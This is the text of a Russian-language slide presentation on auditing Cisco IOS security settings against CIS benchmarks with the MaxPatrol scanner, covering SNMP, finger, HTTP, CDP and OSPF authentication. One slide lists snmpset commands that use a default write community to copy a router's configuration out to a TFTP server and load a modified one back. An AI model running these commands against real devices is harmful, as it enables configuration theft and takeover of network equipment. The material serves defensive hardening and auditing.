34

Сканирование Cisco IOS в MaxPatrol

Embed Size (px)

DESCRIPTION

Сканирование Cisco IOS в MaxPatrol. Сафронов Илья. What’s the deal?. Безопасность сетевых устройств ( Cisco IOS ) Стандарты безопасности Контроль за соответствием стандартам безопасности. Cisco security hardening. Комплексный подход к безопасности устройств Cisco. - PowerPoint PPT Presentation

Citation preview

Page 1: Сканирование  Cisco  IOS в  MaxPatrol
Page 2: Сканирование  Cisco  IOS в  MaxPatrol

Сканирование Cisco IOS в MaxPatrol

Сафронов Илья

Page 3: Сканирование  Cisco  IOS в  MaxPatrol

What’s the deal?― Безопасность сетевых устройств (Cisco IOS)― Стандарты безопасности― Контроль за соответствием стандартам

безопасности

Page 4: Сканирование  Cisco  IOS в  MaxPatrol

Cisco security hardening― Комплексный подход к безопасности устройств

Cisco.• Management Plane (управляющий IOS’ом трафик

(SSH, SNMP))• Control Plane (трафик управления сетью (BGP,

STP))• Data Plane ( проходящие сквозь устройство

данные)

Page 5: Сканирование  Cisco  IOS в  MaxPatrol

Security benchmarking-CIS

Рекомендации и стандарты по безопасности оборудования и ПО.

Page 6: Сканирование  Cisco  IOS в  MaxPatrol

CIS – Cisco IOS

― Бенчмарк по безопасности для Cisco IOS

Page 7: Сканирование  Cisco  IOS в  MaxPatrol

CIS – Cisco IOSГруппы проверок:

― AAA― SNMP― Global services (CDP, DHCP, HTTP)― Logging― Neighbor authentication (EIGRP, OSPF, RIP)

Page 8: Сканирование  Cisco  IOS в  MaxPatrol

Как проверить?― Max Patrol

Page 9: Сканирование  Cisco  IOS в  MaxPatrol

Чего бояться?

Page 10: Сканирование  Cisco  IOS в  MaxPatrol

Проверка SNMP

Page 11: Сканирование  Cisco  IOS в  MaxPatrol

Настройки на устройстве

Page 12: Сканирование  Cisco  IOS в  MaxPatrol

Угроза – Snmpwalk enumeration

Page 13: Сканирование  Cisco  IOS в  MaxPatrol

Угроза - Копирование файла конфигурации через SNMP

TFTP-сервер

snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 integer 1snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 integer 4snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 integer 1snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 address <адрес TFTP-сервера>.snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 string victim-config

snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 integer 1

///Возврат модифицированного файла конфигурации (startup-config) //обратно на устройствоsnmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.670 integer 1snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.670 integer 1snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.670 integer 3snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.670 address <адрес TFTP-сервера>.snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.670 string victim-configsnmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.670 integer 1//Перезагрузка устройства для применения изменений

Page 14: Сканирование  Cisco  IOS в  MaxPatrol

Решение?

Page 15: Сканирование  Cisco  IOS в  MaxPatrol

Проверка finger

Page 16: Сканирование  Cisco  IOS в  MaxPatrol

Настройки на устройстве

Page 17: Сканирование  Cisco  IOS в  MaxPatrol

Угроза – login enumeration

Page 18: Сканирование  Cisco  IOS в  MaxPatrol

Решение?

Page 19: Сканирование  Cisco  IOS в  MaxPatrol

Проверка HTTP

Page 20: Сканирование  Cisco  IOS в  MaxPatrol

Настройки на устройстве

Page 21: Сканирование  Cisco  IOS в  MaxPatrol

Угроза – кража учетных данных

Page 22: Сканирование  Cisco  IOS в  MaxPatrol

Решение ?

Page 23: Сканирование  Cisco  IOS в  MaxPatrol

Проверка CDP

Page 24: Сканирование  Cisco  IOS в  MaxPatrol

Настройки на устройстве

Page 25: Сканирование  Cisco  IOS в  MaxPatrol

Угроза - Enumeration через CDP

Page 26: Сканирование  Cisco  IOS в  MaxPatrol

Решение ?

Page 27: Сканирование  Cisco  IOS в  MaxPatrol

Аутентификация OSPF

Page 28: Сканирование  Cisco  IOS в  MaxPatrol

Настройки на устройстве

Page 29: Сканирование  Cisco  IOS в  MaxPatrol

Угроза – «Отравление» таблиц маршрутизации

Page 30: Сканирование  Cisco  IOS в  MaxPatrol

Решение?

Page 31: Сканирование  Cisco  IOS в  MaxPatrol

Кастомный стандарт― Не нравится / не подходит стандарт?― Собери свой!

Page 32: Сканирование  Cisco  IOS в  MaxPatrol

Заключение― Защищайте свои сетевые устройства― Следите за стандартами безопасности― Регулярно проводите аудит сети

Page 33: Сканирование  Cisco  IOS в  MaxPatrol

Конец рассказаСпасибо за внимание

Сафронов Илья

[email protected]

Page 34: Сканирование  Cisco  IOS в  MaxPatrol